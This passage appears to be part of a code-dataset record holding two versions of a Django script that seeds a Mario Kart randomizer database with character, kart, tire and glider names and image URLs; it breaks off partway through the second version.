"step-3": "<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')\n<mask token>\ndjango.setup()\n<mask token>\nchar_names = ['Mario', 'Luigi', 'Peach', 'Daisy', 'Rosalina',\n 'Mario Tanooki', 'Peach cat', 'Yoshi', 'Yoshi (LBlue)', 'Yoshi (Black)',\n 'Yoshi (Rose)', 'Yoshi (Yellow)', 'Yoshi (White)', 'Yoshi (Blue)',\n 'Yoshi (Rose)', 'Yoshi (Orange)', 'Toad', 'Koopa', 'Shyguy',\n 'Shyguy (LB)', 'Shyguy (Black)', 'Shyguy (Rose)', 'Shyguy (Yellow)',\n 'Shyguy (White)', 'Shyguy (Blue)', 'Shyguy (Rose)', 'Shyguy (Orange)',\n 'Lakitu', 'Toadette', 'Boo', 'Baby Mario', 'Baby Luigi', 'Baby Peach',\n 'Baby Daisy', 'Baby Rosalina', 'Metal Mario', 'Golden Mario',\n 'Golden Peach', 'Wario', 'Waluigi', 'Donkey Kong', 'Bowser', 'Skelerex',\n 'Bowser Jr', 'Dry Bowser', 'Lemmy', 'Larry', 'Wendy', 'Ludwig', 'Iggy',\n 'Roy', 'Morton', 'Inkling (G)', 'Inkling (B)', 'Link (SSBU)',\n 'Link (BOTW)', 'Villager (B)', 'Villager(G)', 'Mary']\nchar_urls = [\n 'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr'\n , 'https://freepngimg.com/thumb/categories/462.png',\n 'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr'\n ,\n 'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png'\n ,\n 'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png'\n ,\n 'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809'\n , 'https://www.123-stickers.com/5731-6069-large/Array.jpg',\n 'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png'\n ,\n 'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png'\n ,\n 'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo'\n ,\n 'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png'\n ,\n 'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM'\n ,\n 'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ'\n ,\n 'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910'\n ,\n 'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014'\n ,\n 'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222'\n ,\n 'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png'\n ,\n 'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117'\n , 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',\n 'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8'\n , 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',\n 'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141'\n ,\n 'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png'\n ,\n 'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png'\n ,\n 'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112'\n ,\n 'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405'\n ,\n 'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png'\n ,\n 'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png'\n ,\n 'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543'\n ,\n 'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en'\n ,\n 'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png'\n ,\n 'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr'\n ]\ncar_names = ['Standard Kart', 'Pipe Frame', 'Mach 8', 'Steel Driver',\n 'Cat Cruiser', 'Circuit Special', 'Tri-Speeder', 'Badwagon', 'Prancer',\n 'Biddybuggy', 'Landship', 'Sneeker', 'Sports Coupe', 'Gold Standard',\n 'GLA', 'W 25 Silver Arrow', '300 SL Roadster', 'Blue Falcon',\n 'Tanooki Kart', 'B Dasher', 'Streetle', 'P-Wing', 'Koopa Clown',\n 'Standard Bike', 'Comet', 'Sport Bike', 'The Duke', 'Flame Rider',\n 'Varmint', 'Mr. Scooty', 'Jet Bike', 'Yoshi Bike', 'Master Cycle',\n 'Master Cycle Zero', 'City Tripper', 'Standard ATV', 'Wild Wiggler',\n 'Teddy Buggy', 'Bone Rattler', 'Splat Buggy', 'Inkstriker']\ncar_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507'\n ]\ntire_names = ['Standard', 'Monster', 'Roller', 'Slim', 'Slick', 'Metal',\n 'Button', 'Off-Road', 'Sponge', 'Wood', 'Cushion', 'Blue Standard',\n 'Hot Monster', 'Azure Roller', 'Crimson Slim', 'Cyber Slick',\n 'Retro Off-Road', 'Gold Tires', 'GLA Tires', 'Triforce Tires',\n 'Ancient Tyres', 'Leaf Tires']\ntire_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810'\n ]\nglider_names = ['Super Glider', 'Cloud Glider', 'Wario Wing', 'Waddle Wing',\n 'Peach Parasol', 'Parachute', 'Parafoil', 'Flower Glider',\n 'Bowser Kite', 'Plane Glider', 'MKTV Parafoil', 'Gold Glider',\n 'Hylian Kite', 'Paraglider', 'Paper Glider']\nglider_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313'\n ]\nx = 0\ny = 0\nfor char in char_names:\n index = x - y + 1\n name = char_names[x]\n if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:\n y += 1\n index = None\n new_char = Character(name=char_names[x], image_url=char_urls[x], index=\n index)\n new_char.save()\n x += 1\nx = 0\nfor tire in tire_names:\n index = x + 1\n new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)\n new_tire.save()\n x += 1\nx = 0\nfor car in car_names:\n index = x + 1\n new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)\n new_car.save()\n x += 1\nx = 0\nfor glider in glider_names:\n index = x + 1\n new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],\n index=index)\n new_glider.save()\n x += 1\n",
"step-4": "import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')\nimport django\ndjango.setup()\nfrom main.models import Character, Vehicle, Tire, Glider\nchar_names = ['Mario', 'Luigi', 'Peach', 'Daisy', 'Rosalina',\n 'Mario Tanooki', 'Peach cat', 'Yoshi', 'Yoshi (LBlue)', 'Yoshi (Black)',\n 'Yoshi (Rose)', 'Yoshi (Yellow)', 'Yoshi (White)', 'Yoshi (Blue)',\n 'Yoshi (Rose)', 'Yoshi (Orange)', 'Toad', 'Koopa', 'Shyguy',\n 'Shyguy (LB)', 'Shyguy (Black)', 'Shyguy (Rose)', 'Shyguy (Yellow)',\n 'Shyguy (White)', 'Shyguy (Blue)', 'Shyguy (Rose)', 'Shyguy (Orange)',\n 'Lakitu', 'Toadette', 'Boo', 'Baby Mario', 'Baby Luigi', 'Baby Peach',\n 'Baby Daisy', 'Baby Rosalina', 'Metal Mario', 'Golden Mario',\n 'Golden Peach', 'Wario', 'Waluigi', 'Donkey Kong', 'Bowser', 'Skelerex',\n 'Bowser Jr', 'Dry Bowser', 'Lemmy', 'Larry', 'Wendy', 'Ludwig', 'Iggy',\n 'Roy', 'Morton', 'Inkling (G)', 'Inkling (B)', 'Link (SSBU)',\n 'Link (BOTW)', 'Villager (B)', 'Villager(G)', 'Mary']\nchar_urls = [\n 'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr'\n , 'https://freepngimg.com/thumb/categories/462.png',\n 'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr'\n ,\n 